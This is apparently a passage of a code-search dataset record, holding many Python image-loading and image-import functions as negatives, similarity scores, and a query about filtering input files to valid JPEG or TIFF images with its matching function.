PySpin.IsWritable(node_width):\r\n\t\t\t# width_to_set = node_width.GetMax()\r\n\t\t\twidth_to_set = cam_params[\"frameWidth\"]\r\n\t\t\tnode_width.SetValue(width_to_set)\r\n\t\t\tprint('Width set to %i...' % node_width.GetValue())\r\n\t\telse:\r\n\t\t\t print('Width not available...')\r\n\r\n\t\t# Set maximum height\r\n\t\t# *** NOTES ***\r\n\t\t# A maximum is retrieved with the method GetMax(). A node's minimum and\r\n\t\t# maximum should always be a multiple of its increment.\r\n\t\tnode_height = PySpin.CIntegerPtr(nodemap.GetNode('Height'))\r\n\t\tif PySpin.IsAvailable(node_height) and PySpin.IsWritable(node_height):\r\n\t\t\t# height_to_set = node_height.GetMax()\r\n\t\t\theight_to_set = cam_params[\"frameHeight\"]\r\n\t\t\tnode_height.SetValue(height_to_set)\r\n\t\t\tprint('Height set to %i...' 
% node_height.GetValue())\r\n\t\telse:\r\n\t\t\tprint('Height not available...')\r\n\r\n\texcept PySpin.SpinnakerException as ex:\r\n\t\tprint('Error: %s' % ex)\r\n\t\treturn False\r\n\r\n\treturn result, width_to_set, height_to_set", "def load(self):\n logger.debug(f\"Reading {self.path.name}\")\n self.label = int(Data.fromLabel(self.path.parent.name))\n self.image = skimg.data.imread(self.path)", "def load_image(filename, color=True):\n img = skimage.img_as_float(skimage.io.imread(filename, as_grey=not color)).astype(np.float32)\n if img.ndim == 2:\n img = img[:, :, np.newaxis]\n if color:\n img = np.tile(img, (1, 1, 3))\n elif img.shape[2] == 4:\n img = img[:, :, :3]\n return img", "def update_image(self):\n if self.filenames:\n pos = self.slider.value()\n proj, flat, dark, theta = dx.read_aps_32id(self.filenames, proj=(pos, pos+1))\n if self.ffc_correction:\n image = proj[0,:,:].astype(np.float)/flat[0,:,:].astype(np.float)\n else:\n image = proj[0,:,:].astype(np.float)\n self.image_item.setImage(image)", "def _load_image(self, index: int) -> Tensor:\n path = self.files[index][\"image\"]\n with rasterio.open(path) as f:\n array = f.read()\n tensor = torch.from_numpy(array).float()\n return tensor", "def _load_image_set_index(self, anno_filepath):\n # Check\n assert os.path.exists(anno_filepath), \\\n 'Path does not exist: {}'.format(anno_filepath)\n # Open and read\n with open(anno_filepath) as f:\n # format: imgidx x1 y1 x2 y2 label_list\n # whre label list look like this: 0 0 0 0 1 0 0 (assume here has six action classes)\n image_index = [x.strip().split()[0] for x in f.readlines()]\n # \n return image_index", "async def cmd_galloadsettings(self, ctx):\n config = Config()\n\n # ===== UPDATE THE SETTINGS IN THE LOCAL COG\n self.cogset['guild_id'] = config.target_guild_id\n self.cogset['enable']= config.galEnable\n self.cogset['channel_ids'] = config.gallerys[\"chls\"]\n self.cogset['text_expirein']= config.gallerys['expire_in']\n self.cogset['rem_low']= config.gallerys['rem_low']\n self.cogset['user_wl']= config.gallerys[\"user_wl\"]\n self.cogset['allow_links']= config.gallerys[\"links\"]\n self.cogset['link_wl']= config.gallerys['link_wl']\n\n # ===== SAVE COG SETTING\n await cogset.SAVE(self.cogset, cogname=self.qualified_name)\n \n # ===== RETURN\n await ctx.channel.send(content=\"Gallery information has been updated from the setup.ini file\", delete_after=15)\n return", "def settings(self):\n return dict(img_size=self.img_size, interpolation=self.interpolation)", "def loadImagesTag(self): \n dictionary = {}\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(GENDER_FRONT)\n dictionary[\"gender\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIN_BACK)\n dictionary[\"skin\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(HEAD_BACK)\n dictionary[\"head\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(BODY_BACK)\n dictionary[\"body\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(MASK_BACK)\n dictionary[\"mask\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(HAIR_BACK)\n dictionary[\"hair\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n if self.avatarConfiguration[\"gender\"] == \"boy\":\n imgPath = 
GG.genteguada.GenteGuada.getInstance().getDataPath(SHIRT_BACK)\n dictionary[\"shirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(TROUSERS_BACK)\n dictionary[\"trousers\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIRT_BACK)\n dictionary[\"skirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n else:\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SHIRT_DISABLED)\n dictionary[\"shirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(TROUSERS_DISABLED)\n dictionary[\"trousers\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIRT_BACK)\n dictionary[\"skirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SHOES_BACK)\n dictionary[\"shoes\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n return dictionary", "def load_tile(path, tile_size):\n img = pyglet.resource.image(path)\n img.width = tile_size\n img.height = tile_size\n return img", "def test_load_jpg():\n parameters = {'path': 'green-dot.jpg'}\n\n images.load(parameters)", "def set_imagefile(self,imagefile):\n self.imagefile = imagefile", "def _load_image_set_index(self):\n image_index = self._load_annotations().keys()\n return image_index", "def import_file(self, *args, **kwargs):\n filename = self.file\n self.completed_layers = []\n err = GdalErrorHandler()\n gdal.PushErrorHandler(err.handler)\n gdal.UseExceptions()\n configuration_options = kwargs.get('configuration_options', [{'index': 0}])\n\n # Configuration options should be a list at this point since the importer can process multiple layers in a\n # single import\n if isinstance(configuration_options, dict):\n configuration_options = [configuration_options]\n\n data, inspector = self.open_source_datastore(filename, *args, **kwargs)\n\n datastore_layers = inspector.describe_fields()\n\n if len(datastore_layers) == 0:\n logger.debug('No Dataset found')\n\n layers_info = []\n\n # Add index for any layers configured by name\n for layer_configuration in configuration_options:\n if 'layer_name' in layer_configuration:\n lookup = 'layer_name'\n elif 'index' in layer_configuration:\n lookup = 'index'\n else:\n lookup = None\n logger.debug('could not find lookup')\n continue\n\n for datastore_layer in datastore_layers:\n if datastore_layer.get(lookup) == layer_configuration.get(lookup):\n layer_configuration.update(datastore_layer)\n layers_info.append(layer_configuration)\n\n for layer_options in layers_info:\n if layer_options['raster']:\n \"\"\"\n File is a raster, we need to convert into optimized GeoTiff\n and skip any further testing or loading into target_store\n \"\"\"\n # Increment filename to make sure target doesn't exists\n filedir, filebase = os.path.split(filename)\n outfile = '%s.tif' % os.path.splitext(filebase)[0]\n fileout = increment_filename(os.path.join(RASTER_FILES, outfile))\n raster_import(layer_options['path'], fileout)\n self.completed_layers.append([fileout, layer_options])\n else:\n target_file, _ = self.open_target_datastore(self.target_store)\n target_create_options = []\n\n # Prevent numeric field overflow for shapefiles https://trac.osgeo.org/gdal/ticket/5241\n if target_file.GetDriver().GetName() == 'PostgreSQL':\n target_create_options.append('PRECISION=NO')\n\n layer_options['modified_fields'] 
= {}\n layer = data.GetLayer(layer_options.get('index'))\n layer_name = layer_options.get('name', layer.GetName().lower())\n layer_type = self.get_layer_type(layer, data)\n srs = layer.GetSpatialRef()\n\n if layer_name.lower() == 'ogrgeojson':\n try:\n layer_name = os.path.splitext(os.path.basename(filename))[0].lower()\n except IndexError:\n pass\n\n layer_name = launder(str(layer_name))\n\n # default the layer to 4326 if a spatial reference is not provided\n if not srs:\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4326)\n\n # pass the srs authority code to handlers\n if srs.AutoIdentifyEPSG() == 0:\n layer_options['srs'] = '{0}:{1}'.format(srs.GetAuthorityName(None), srs.GetAuthorityCode(None))\n\n n = 0\n while True:\n n += 1\n try:\n target_layer = self.create_target_dataset(target_file, layer_name, srs, layer_type,\n options=target_create_options)\n except RuntimeError as e:\n # logger.exception('exception in creating target dataset')\n # the layer already exists in the target store, increment the name\n if 'Use the layer creation option OVERWRITE=YES to replace it.' in e.message:\n layer_name = increment(layer_name)\n\n # try 100 times to increment then break\n if n >= 100:\n break\n\n continue\n else:\n raise e\n break\n\n # adding fields to new layer\n layer_definition = ogr.Feature(layer.GetLayerDefn())\n source_fid = None\n\n wkb_field = 0\n\n for i in range(layer_definition.GetFieldCount()):\n\n field_def = layer_definition.GetFieldDefnRef(i)\n\n if field_def.GetName() == target_layer.GetFIDColumn() and field_def.GetType() != 0:\n field_def.SetType(0)\n\n if field_def.GetName() != 'wkb_geometry':\n target_layer.CreateField(field_def)\n new_name = target_layer.GetLayerDefn().GetFieldDefn(i - wkb_field).GetName()\n old_name = field_def.GetName()\n\n if new_name != old_name:\n layer_options['modified_fields'][old_name] = new_name\n\n if old_name == target_layer.GetFIDColumn() and not layer.GetFIDColumn():\n source_fid = i\n else:\n wkb_field = 1\n\n if wkb_field is not 0:\n layer.SetIgnoredFields(['wkb_geometry'])\n\n for i in range(0, layer.GetFeatureCount()):\n feature = layer.GetFeature(i)\n\n if feature and feature.geometry():\n\n if not layer.GetFIDColumn():\n feature.SetFID(-1)\n\n if feature.geometry().GetGeometryType() != target_layer.GetGeomType() and \\\n target_layer.GetGeomType() in range(4, 7):\n\n conversion_function = ogr.ForceToMultiPolygon\n\n if target_layer.GetGeomType() == 5:\n conversion_function = ogr.ForceToMultiLineString\n\n elif target_layer.GetGeomType() == 4:\n conversion_function = ogr.ForceToMultiPoint\n\n geom = ogr.CreateGeometryFromWkb(feature.geometry().ExportToWkb())\n feature.SetGeometry(conversion_function(geom))\n\n if source_fid is not None:\n feature.SetFID(feature.GetField(source_fid))\n\n try:\n target_layer.CreateFeature(feature)\n\n except:\n for field in range(0, feature.GetFieldCount()):\n if feature.GetFieldType(field) == ogr.OFTString:\n try:\n feature.GetField(field).decode('utf8')\n except UnicodeDecodeError:\n feature.SetField(field, decode(feature.GetField(field)))\n except AttributeError:\n continue\n try:\n target_layer.CreateFeature(feature)\n except err as e:\n logger.error('Create feature failed: {0}'.format(gdal.GetLastErrorMsg()))\n raise e\n\n self.completed_layers.append([target_layer.GetName(), layer_options])\n\n return self.completed_layers", "def image_process(image_info):\n path = os.path.join(cfg.IMAGESET, image_info.get(\"index\") + \".jpg\")\n if not os.path.exists(path):\n raise IOError(\"please check your 
file is not exists: \" + path)\n def load_image(path):\n image = Image.open(path)\n return image\n return load_image(path)", "def import_image(filepath):\n \n im_path = os.path.join(str(filepath))\n im_files = glob.glob(im_path)\n im_col = []\n \n for imc in im_files:\n #imc = plt.imread(img, 0) # changed from cv2.imread\n img = cv2.imread(imc, cv2.COLOR_BGR2GRAY)\n imcg = np.array(img)\n try:\n xy = np.shape(imcg) #added\n except:\n continue\n imgr = imcg.reshape((xy[0]*xy[1],)) #added\n imgr = np.array(imgr)\n im_col.append(imgr.transpose())\n \n return(im_col)", "def import_media(self, path):\n media_vertex = {}\n infile = configparser.ConfigParser()\n infile.read(path, encoding='utf-8')\n # Use the path name for error messages or assignments\n for field in infile.items(\"media\"):\n if (field[0].find(\"photo\") != -1 and\n len(field[0].split(\".\")) == 2):\n # Process a small set of photo credits for all the pandas\n # author = infile.get(\"media\", field[0] + \".author\")\n # if author in self.photo[\"credit\"].keys():\n # self.photo[\"credit\"][author] = self.photo[\"credit\"][author] + 1\n # else:\n # self.photo[\"credit\"][author] = 1\n # Track what the max number of panda photos an object has is\n # test_count = int(field[0].split(\".\")[1])\n # if test_count > self.photo[\"max\"]:\n # self.photo[\"max\"] = test_count\n # Accept the data and continue\n media_vertex[field[0]] = field[1]\n # TODO: track video info for apple counting as well\n else:\n # Accept the data and move along\n media_vertex[field[0]] = field[1]\n self.media.append(media_vertex)\n self.vertices.append(media_vertex)\n self.media_files.append(path)", "def _load_image_set_index(self):\n image_set_file = os.path.join(self._data_path, 'ImageSets', 'Main',\n self._image_set + '.txt')\n assert os.path.exists(image_set_file), \\\n 'Path does not exist: {}'.format(image_set_file)\n with open(image_set_file) as f:\n image_index = [x.strip() for x in f.readlines()]\n return image_index", "def import_images(folder_path, alphabet_list):\n reference_images = {}\n for i in alphabet_list[:-1] + ['space']:\n img = np.array(Image.open(folder_path + f'/{i}.png')).astype('int')\n reference_images[i] = img\n reference_images[' '] = reference_images.pop('space')\n return reference_images", "def load_background(self, image):\n self.bg = pygame.image.load(image).convert()", "def getFile(self):\r\n self.file_name=QtGui.QFileDialog.getOpenFileName(self, \"Open Image file\", self.path, \"*tif\")\r\n if self.file_name!='':\r\n \r\n self.img= skimage.io.imread(str(self.file_name), plugin='tifffile')\r\n \"\"\"sets self.img equal to the chosen image\"\"\"\r\n \r\n self.temp= interp_img(np.zeros(self.img.shape), self.zinterp)\r\n self.edge= interp_img(np.zeros(self.img.shape), self.zinterp)\r\n self.shrink= np.zeros(self.img.shape)\r\n self.count=0\r\n \r\n self.z_stack=self.img.shape[0]/2\r\n self.y_stack=self.img.shape[1]/2\r\n self.x_stack=self.img.shape[2]/2\r\n \r\n self.dispedge = to_rgb(self.img[self.z_stack])\r\n self.y_dispedge= to_rgb(self.img[:,self.y_stack,:])\r\n self.x_dispedge= to_rgb(self.img[:,:,self.x_stack])\r\n #self.pixmap=QtGui.QPixmap.fromImage(ImageQt.ImageQt(misc.toimage(self.img[self.z_stack]))).scaled(500,500)\r\n \r\n self.resetImages()", "def load_image(self, image_id):\n info = self.image_info[image_id]\n # bg_color = np.array(info['bg_color']).reshape([1, 1, 3])\n # image = np.ones([info['height'], info['width'], 3], dtype=np.uint8)\n # image = image * bg_color.astype(np.uint8)\n # for shape, color, dims in 
info['shapes']:\n # image = self.draw_shape(image, shape, dims, color)\n\n width, height = info['width'], info['height']\n\n if info['real']:\n # load image from disk\n impath = os.path.join(self.real_image_dirpath, info['real_image_path'])\n image = cv2.imread(impath,1)\n image = cv2.resize(image, (width, height), cv2.INTER_CUBIC)\n else:\n # synthesize image\n background_path = info['background_image_path']\n card_template_path = info['card_template_path']\n cornerpoints = info['cornerpoints']\n image = self.synthesize_image(card_template_path, background_path, cornerpoints, (width, height))\n return image", "def __init__(self, image_size, heatmap_size):\n super(ProjectLayer, self).__init__()\n self.image_size = image_size\n self.heatmap_size = heatmap_size\n if isinstance(self.image_size, int):\n self.image_size = [self.image_size, self.image_size]\n if isinstance(self.heatmap_size, int):\n self.heatmap_size = [self.heatmap_size, self.heatmap_size]", "def initImg(self):\n self.img = Image.new('RGBA',(self.width,self.height),color='#' + getConfigPart(self.theme,\"bg\"))\n self.draw = ImageDraw.Draw(self.img)", "def setup():\n img = Image.new('RGB', (10, 20))\n img.putpixel((5, 10), (0, 255, 0))\n img.save('green-dot.tif')\n img.save('green-dot.jpg')\n img.save('green-dot.png')", "def load(self, image_loader):\n self._image_loader = image_loader\n for tile_set in self.tile_sets:\n # do images first, because tiles could reference it\n for img in tile_set.images:\n if img.source:\n self._load_image_from_source(tile_set, img)\n else:\n tile_set.indexed_images[img.id] = self._load_image(img)\n # tiles\n for tile in tile_set.tiles:\n for img in tile.images:\n if not img.content and not img.source:\n # only image id set\n indexed_img = tile_set.indexed_images[img.id]\n self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img)\n else:\n if img.source:\n self._load_image_from_source(tile_set, img)\n else:\n indexed_img = self._load_image(img)\n self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img)", "def load(self, image_loader):\n self._image_loader = image_loader\n for tile_set in self.tile_sets:\n # do images first, because tiles could reference it\n for img in tile_set.images:\n if img.source:\n self._load_image_from_source(tile_set, img)\n else:\n tile_set.indexed_images[img.id] = self._load_image(img)\n # tiles\n for tile in tile_set.tiles:\n for img in tile.images:\n if not img.content and not img.source:\n # only image id set\n indexed_img = tile_set.indexed_images[img.id]\n self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img)\n else:\n if img.source:\n self._load_image_from_source(tile_set, img)\n else:\n indexed_img = self._load_image(img)\n self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img)", "def __init__(self, opt):\r\n super().__init__(opt)\r\n\r\n self.image_color = []\r\n for folder in self.annotations.keys():\r\n for image in self.annotations[folder].keys():\r\n img_path = os.path.join(self.root_dir, folder, image)\r\n camera, spec, n = image.split('_')\r\n if camera == 'BB':\r\n continue\r\n else:\r\n if spec == 'color':\r\n self.image_color.append(img_path)\r\n\r\n def sort_priority(x):\r\n *_, folder, name = x.split('/')\r\n folder_n = int(folder[1])\r\n folder_t = folder[2]\r\n name = int(name[0:-4].split('_')[-1])\r\n return folder_n, folder_t, name\r\n\r\n self.image_source, self.image_target = self._get_src_tgt(\r\n opt.augmentation_ratio, self.image_color, 
sort_priority)", "def open_image(self):\n self.orig_image = Image.open(self.filename)\n if self.in_rgb:\n self.orig_image = self.orig_image.convert(\"RGB\")\n if self.min_filter:\n self.orig_image.filter(ImageFilter.MinFilter(self.min_filter))", "def _load_image_set_index(self):\n image_index = []\n image_set_file = self.data_dir \\\n + \"/ImageSets/{}.txt\".format(self.mode)\n\n assert os.path.exists(image_set_file), \\\n 'Path does not exist: {}'.format(image_set_file)\n with open(image_set_file, 'r') as f:\n for line in f.readlines():\n image_index.append(line.strip())\n return image_index", "def import_photos(site):\n image_bank = site['institucional']['fotos']\n image_names = ['plenario-camara.jpg', 'plenario-senado.jpg', 'congresso-nacional.jpg']\n # look inside \"static\" folder and import some files\n path = os.path.dirname(os.path.abspath(__file__)) + '/browser/static/'\n logger.info(u'Importando imagens')\n for name in image_names:\n with open(path + name) as f:\n image = StringIO(f.read())\n img_name = name.split('.')[0]\n title = img_name.replace('-', ' ').title()\n api.content.create(\n image_bank,\n type = 'Image',\n id = name,\n title = title,\n description = u'Foto de demonstração no tamanho 3x2. (esta imagem é um conteúdo de exemplo e pode ser removida)',\n image = image,\n creators = CREATORS,\n )\n logger.debug(u' {0} importada'.format(name))", "def test_grdimage_file():\n fig = Figure()\n fig.grdimage(\n \"@earth_relief_01d_g\",\n cmap=\"ocean\",\n region=[-180, 180, -70, 70],\n projection=\"W0/10i\",\n shading=True,\n )\n return fig", "def _set_attr(self):\n self.as_skeletal = self._import_as_skeleton()\n self.materials = self._import_materials()\n self.textures = self._import_textures()", "def get_image(self):\n if self._image is None:\n image_data = np.load(self.image_file)\n if not isinstance(image_data, np.ndarray):\n image_data = image_data['arr_0']\n self.meta_data = ImageWrapper.load_metadata(self.image_file+\".meta\")\n exposure_time = self.meta_data['exposure_time_us'] * 1e-6\n dark_level = float(self.meta_data['black_level'])\n # saturation_mask = image_data.max(axis=2) >= 4094\n image_data = np.clip((image_data.astype(np.float32) - dark_level),\n a_min=0.0, a_max=None) / exposure_time\n if self.original_vignetting is not None:\n image_data = image_data / self.original_vignetting\n if self.crop is not None:\n image_data = image_data[\n self.crop[1,0]:self.crop[1,1],\n self.crop[0,0]:self.crop[0,1]\n ]\n # saturation_mask = saturation_mask[\n # self.crop[1,0]:self.crop[1,1],\n # self.crop[0,0]:self.crop[0,1]\n # ]\n if self.down_sample is not None:\n image_data = cv2.resize(\n image_data,\n dsize=None,\n fx=1./self.down_sample,\n fy=1./self.down_sample,\n interpolation=cv2.INTER_AREA\n )\n # saturation_mask = cv2.resize(\n # saturation_mask,\n # dsize=None,\n # fx=1./self.down_sample,\n # fy=1./self.down_sample,\n # interpolation=cv2.INTER_AREA\n # )\n if self.reup_sample is not None:\n image_data = cv2.resize(\n image_data,\n dsize=None,\n fx=self.reup_sample,\n fy=self.reup_sample,\n interpolation=cv2.INTER_CUBIC\n )\n # saturation_mask = cv2.resize(\n # saturation_mask,\n # dsize=None,\n # fx=self.reup_sample,\n # fy=self.reup_sample,\n # interpolation=cv2.INTER_CUBIC\n # )\n image = torch.tensor(np.transpose(image_data, (2,0,1)), dtype=torch.float32, device=self.device)\n # saturation_mask = torch.tensor(saturation_mask, dtype=torch.float32, device=self.device)\n if not self.lazy:\n self._image = image\n # self._saturation_mask = saturation_mask\n else:\n 
image = self._image\n # saturation_mask = self._saturation_mask\n\n return image#, saturation_mask", "def load_images(self):\n for image in self.gltf.images:\n self.images.append(image.load(self.path.parent))", "def create_preset_images(self):\n for f in sorted(self.get_files_from_data()):\n photoInstances = {}\n for preset in self.generator.settings[\"GALLERY_PRESETS\"]:\n preset_dir = \"%s%s%s\" % (self.absolute_output_path,\n os.sep, \n preset[\"name\"])\n photoInstances[preset[\"name\"]] = Photo(self, f, preset_dir, preset)\n \n self.photos.append(photoInstances)", "def import_L1B(cls,infile):\r\n try:\r\n import gdal\r\n import rasterio\r\n except:\r\n raise ImportError(\"Can not import module GDAL or RasterIO\")\r\n\r\n\r\n image=image()\r\n\r\n #except:\r\n # raise ImportError(\"Can not read band\")\r", "def import_graphics_section(self, filename_suffix='gra'):\n pass", "def load(cls):\n\n cls.images[\"Wall\"] = pygame.image.load(\n \"ressources/images/wall.png\").convert()\n cls.images[\"MacGyver\"] = pygame.image.load(\n \"ressources/images/Mac.png\").convert()\n cls.images[\"Guardian\"] = pygame.image.load(\n \"ressources/images/Guardian.png\").convert()\n cls.images[\"Path\"] = pygame.image.load(\n \"ressources/images/path.png\").convert()\n cls.images[\"Tube\"] = pygame.image.load(\n \"ressources/images/tube.png\").convert()\n cls.images[\"Ether\"] = pygame.image.load(\n \"ressources/images/ether.png\").convert()\n cls.images[\"Needle\"] = pygame.image.load(\n \"ressources/images/needle.png\").convert()\n cls.images[\"gr\"] = pygame.image.load(\n \"ressources/images/but_du_jeu.png\").convert()", "def load_base_images(base_img):\n if base_img is not None:\n if not os.path.exists(base_img):\n base_img = os.path.join(LIGHTHOUSES_DIR, base_img)\n return (\n Image.open(os.path.join(base_img, 'on.gif')).convert('RGBA'),\n Image.open(os.path.join(base_img, 'off.gif'))\n )\n return None, None", "def load_image(self, name, colorkey=None):\n dictname = name[0:name.find('.')]\n fullname = os.path.join('TeddyLevel','data', name)\n try:\n image = pygame.image.load(fullname)\n except pygame.error, message:\n print 'Cannot load image:', fullname\n raise SystemExit, message\n image = image.convert()\n if colorkey is not None:\n if colorkey is -1:\n colorkey = image.get_at((0,0))\n image.set_colorkey(colorkey, RLEACCEL)\n self.dict[dictname] = image, image.get_rect()", "def load_image(self, image_name, piece_name):\n img = ImageTk.PhotoImage(Image.open(image_name))\n self.loaded_images[piece_name] = (img, image_name)\n return img", "def load(f, as_grey=False):\n use_plugin('pil')\n return imread(os.path.join(assets, f), as_grey=as_grey)", "def get_additional_images_downsample(widget) -> Dict[str, str]:\n images = {}\n for layer in widget.viewer.value.layers.selection:\n if layer._source.path is not None:\n images[layer._name] = str(layer._source.path)\n return images", "def imageItems(self, context):\n prefs = getPreferences()\n\n images = [('NONE', \"––– Select –––\", \"\")]\n if prefs.path_value:\n for img in environmentImages(prefs.path_value):\n images.append((img, img, \"\"))\n\n return images", "def load_image(self, image_id):\n # Load image\n image = skimage.io.imread(self.image_info[image_id]['path'])\n # If grayscale. 
Convert to RGB for consistency.\n if image.ndim != 3:\n image = skimage.color.gray2rgb(image)\n # If has an alpha channel, remove it for consistency\n if image.shape[-1] == 4:\n image = image[..., :3]\n return image", "def __init__(self):\n# This is the top container for all data. The gid is the global id (for a image).\n# Before calling convert most of the values are strings. Some additional\n# values are also calculated, see convert() for details. After calling\n# convert, most values are integers or floats where appropriat.\n # set through parser\n self.orientation = None\n self.tileheight = 0\n self.tilewidth = 0\n self.width = 0\n self.height = 0\n self.version = 0\n self.tile_sets = [] # TileSet\n self.layers = [] # WorldTileLayer <- what order? back to front (guessed)\n self.indexed_tiles = {} # {gid: (offsetx, offsety, image}\n self.object_groups = []\n self.properties = {} # {name: value}\n # additional info\n self.pixel_width = 0\n self.pixel_height = 0\n self.named_layers = {} # {name: layer}\n self.named_tile_sets = {} # {name: tile_set}\n self.map_file_name = \"\"\n self._image_loader = None", "def __init__(self):\n# This is the top container for all data. The gid is the global id (for a image).\n# Before calling convert most of the values are strings. Some additional\n# values are also calculated, see convert() for details. After calling\n# convert, most values are integers or floats where appropriat.\n # set through parser\n self.orientation = None\n self.tileheight = 0\n self.tilewidth = 0\n self.width = 0\n self.height = 0\n self.version = 0\n self.tile_sets = [] # TileSet\n self.layers = [] # WorldTileLayer <- what order? back to front (guessed)\n self.indexed_tiles = {} # {gid: (offsetx, offsety, image}\n self.object_groups = []\n self.properties = {} # {name: value}\n # additional info\n self.pixel_width = 0\n self.pixel_height = 0\n self.named_layers = {} # {name: layer}\n self.named_tile_sets = {} # {name: tile_set}\n self.map_file_name = \"\"\n self._image_loader = None", "def load_image_patch(filename):\n im = Image.open(filename) # .convert('L')\n width, height = im.size\n pixels = list(im.getdata())\n features = [pixels[i * width:(i + 1) * width] for i in range(height)]\n features = np.asarray(im, dtype=np.float32).flatten()\n features /= 255.0\n return features", "def read_image(filename, representation):\n img = imread(filename)\n img = int2float(img)\n if representation == GS_REP:\n img = rgb2gray(img)\n return img", "def load_image_file_like(self, file_like_obj, colorkey=None): # -> image\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def load_image_file_like(self, file_like_obj, colorkey=None): # -> image\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def init_image_info():\n if not os.path.exists(UPLOAD_FOLDER):\n os.makedirs(UPLOAD_FOLDER)", "def __init__(self, image_size=224):\n super().__init__()\n raster_settings = {'image_size': image_size, 'blur_radius': 0.0, 'faces_per_pixel': 1, 'bin_size': None, 'max_faces_per_bin': None, 'perspective_correct': False}\n raster_settings = dict2obj(raster_settings)\n self.raster_settings = raster_settings", "def load_image(self, image_id):\n # Load image\n# print(self.image_info[image_id]['path'])\n image = cv2.imread(self.image_info[image_id]['path'],cv2.IMREAD_GRAYSCALE) \n image = image[:,:, np.newaxis] #Add 1 dimension for grayscale images\n return image", "def image(self):\n # TODO: make sure this method works for png, gif, tiff\n if 
self.has_metadata:\n self.extract_metadata()\n tempdir_path = self.make_tempdir()\n tempfile_path = os.path.join(tempdir_path, self.filename)\n warnings.simplefilter('error', Image.DecompressionBombWarning)\n try: # Do image conversions\n img_in = Image.open(self.src_path)\n img_out = Image.frombytes(img_in.mode, img_in.size, img_in.tobytes())\n img_out.save(tempfile_path)\n self.src_path = tempfile_path\n except Exception as e: # Catch decompression bombs\n # TODO: change this from all Exceptions to specific DecompressionBombWarning\n self.add_error(e, \"Caught exception (possible decompression bomb?) while translating file {}.\".format(self.src_path))\n self.make_dangerous()\n self.add_file_string('Image file')\n self.set_property('processing_type', 'image')", "def load_annaation(self, image_id):\n info = self.image_info[image_id]\n # Get mask directory from image path\n mask_dir = os.path.join(os.path.dirname(os.path.dirname(info['path'])), \"masks\")\n\n\n m = skimage.io.imread(os.path.join(mask_dir, info['id']+'.png')) / 255\n\n return m", "def set_image(self):\r\n return loader.GFX['instructions_box']", "def __init__(self, group, image, x, y, tile_size):\n\t\tsuper().__init__(group, image, x, y, tile_size)", "def import_registry_settings(site):\n PROFILE_ID = 'profile-interlegis.portalmodelo.policy:default'\n setup = api.portal.get_tool('portal_setup')\n setup.runImportStepFromProfile(PROFILE_ID, 'plone.app.registry')" ]
[ "0.6126535", "0.610119", "0.5611701", "0.5601905", "0.55795354", "0.554965", "0.54795593", "0.5368683", "0.53583604", "0.53392506", "0.5296245", "0.525413", "0.525413", "0.5213607", "0.5202142", "0.51820916", "0.51820916", "0.51820916", "0.51808995", "0.5156906", "0.5153215", "0.512968", "0.512968", "0.5125932", "0.51160985", "0.51145786", "0.5098552", "0.5091045", "0.5075054", "0.50672543", "0.50628537", "0.50479895", "0.50423056", "0.5042086", "0.504077", "0.5021402", "0.5013127", "0.5012614", "0.50004125", "0.49943146", "0.4987496", "0.49874124", "0.49819687", "0.49626672", "0.49575067", "0.4949178", "0.49454367", "0.49315512", "0.49268997", "0.49193117", "0.49144447", "0.49140024", "0.49107996", "0.4909449", "0.49007422", "0.4889291", "0.48859265", "0.4885368", "0.48852867", "0.4881438", "0.48692146", "0.48666787", "0.4856253", "0.48560485", "0.48488545", "0.48401704", "0.48365328", "0.48365328", "0.4825166", "0.48244274", "0.48226112", "0.48222485", "0.48215404", "0.4818413", "0.4812128", "0.4811772", "0.48090637", "0.48072907", "0.48013374", "0.48005486", "0.47973627", "0.47939783", "0.47907323", "0.47841895", "0.47746143", "0.47723445", "0.4771962", "0.47714326", "0.47714326", "0.47701114", "0.4765229", "0.47637597", "0.47637597", "0.4759704", "0.47568965", "0.4753762", "0.47504622", "0.47414607", "0.473265", "0.47250515", "0.4724442" ]
0.0
-1
Filter input file list and keep valid JPEG or TIFF images.
def get_input_files(): raw_list = abspath(get('input_files')) valid_types = ['image/jpeg', 'image/tiff'] images = [x for x in raw_list if mimetypes.guess_type(x)[0] in valid_types] print('* Input images: {}'.format(len(images))) return images
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
